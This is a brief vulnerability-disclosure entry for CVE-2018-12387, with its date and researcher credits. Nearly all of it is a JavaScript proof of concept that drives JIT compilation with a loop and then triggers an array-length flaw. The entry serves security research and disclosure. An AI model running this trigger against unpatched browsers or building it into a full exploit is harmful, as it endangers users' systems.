CVE-2018-12387

  • Date: Oct 2018
  • Credit: Bruno Keith and Niklas Baumstark

PoC

function f(o) {
    var a = [o];
    a.length = a[0];
    var useless = function () {}
    var sz = Array.prototype.push.call(a, 42, 43);
    (function () {
        sz;
    })(new Boolean(false));
}
for (var i = 0; i < 25000; i++) {
    f(1);
}
f(2);

Reference